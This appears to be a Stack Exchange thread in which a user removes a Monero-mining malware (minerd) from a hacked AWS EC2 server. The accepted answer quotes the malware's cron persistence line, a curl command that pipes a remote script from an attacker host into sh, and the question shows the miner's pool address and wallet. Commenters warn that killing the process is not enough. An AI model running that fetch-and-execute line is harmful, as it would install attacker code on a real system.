How can I kill minerd malware on an AWS EC2 instance?

  • I have an AWS EC2 instance running RHEL 7.2 which seems to have been hacked by a BitCoin CPU Miner. When I run ps -eo pcpu,args --sort=-%cpu | head, it shows that there is a CPU miner that's taking up more than 90% of CPU utilization.

    %CPU COMMAND
    99.8 /opt/minerd -B -a cryptonight -o stratum+tcp://xmr.crypto-pool.fr:8080 -u 47TS1NQvebb3Feq91MqKdSGCUq18dTEdmfTTrRSGFFC2fK85NRdABwUasUA8EUaiuLiGa6wYtv5aoR8BmjYsDmTx9DQbfRX -p x
    

    It also shows up when I run top -bn2 |sed -n '7,25'p -

      PID USER      PR  NI    VIRT    RES    SHR S %CPU %MEM     TIME+ COMMAND
    21863 root      20   0  237844   3300   1012 S 42.0  0.1   3:49.55 minerd
    

    I keep trying to remove minerd from /opt/ but it keeps spinning itself up again. Previously I had KHK75NEOiq33 and a yam directory. I was able to delete them but not minerd.

    How can I permanently remove this? I've also tried killing the PID individually with sudo kill -9 and sudo kill -2. Is there any antivirus that I can use to get rid of it?

    EDIT - The question was marked as a possible duplicate to another question. However, the difference is that I'm inquiring about a specific malware. I have found the solution to the question, which I will be posting below.

    This is why snapshots are important....

    @AndréBorie I'm trying to be really specific with the type of malware unlike the question you mentioned. I've already taken a few security measures such as restricting the SSH to my IP. I'm really looking for a way to kill this `minerd` malware.

    @AnishSana once the malware is on the server you do not simply "kill" the malware, you reinstall the server. Otherwise you put yourself, your company and your customers at risk because there is no way to be sure that you really "killed" the malware.

    FWIW here's a similar issue, albeit a different mining process: http://unix.stackexchange.com/questions/129035/have-i-been-hacked seems to have some useful links in the answers

  • Anish Sana

    Anish Sana Correct answer

    5 years ago

    I found the solution to removing minerd. I was lucky enough to find the actual script that was used to infect my server. All I had to do was remove the elements placed by this script -

    1. On monkeyoto's suggestion, I blocked all communication with the mining pool server - iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.
    2. Removed the cron */15 * * * * curl -fsSL https://r.chanstring.com/api/report?pm=0706 | sh from /var/spool/cron/root and /var/spool/cron/crontabs/root.
    3. Removed the directory /opt/yam.
    4. Removed /root/.ssh/KHK75NEOiq.
    5. Deleted the files /opt/minerd and /opt/KHK75NEOiq33.
    6. Stopped the minerd process - pkill minerd.
    7. Stopped lady - service lady stop.

    I ran ps -eo pcpu,args --sort=-%cpu | head, top -bn2 |sed -n '7,25'p and ps aux | grep minerd after that and the malware was nowhere to be seen.

    I still need to figure out how it gained access into the system but I was able to disable it this way.

    Now that the attackers know that you have detected them, that you have ruthlessly shut down their proggie (you killed the fruit of their job!), but that you still leaved their initial access door opened, chances are that they will come back for revenge and either be more furtive, or devastating, or both, as they please... or maybe you're lucky and they are too busy somewhere else, you never know. On my side last time I informed a webmaster that his website was hacked I started to have people trying to break into my mailbox for two months, just to let you know...

    @WhiteWinterWolf That's a fair suggestion. I don't understand why my solution to the problem had to be down-voted though? It obviously works since I was able to disable `minerd` and possibly a fix for someone who encounters the same problem?

    If you ask me it is not me who down-voted your answer.

    @AnishSana did you investigate how it got in? I have an affected ec2 instance which I maintained with high hygiene. I've no clue how it got infected.

    Same thing happened to my server.. in my server, the cause of it was likely to be redis (I didn't set a password)

    @AnishSana Thankyou for your answer. You save my day.

License under CC-BY-SA with attribution


Content dated before 7/24/2021 11:53 AM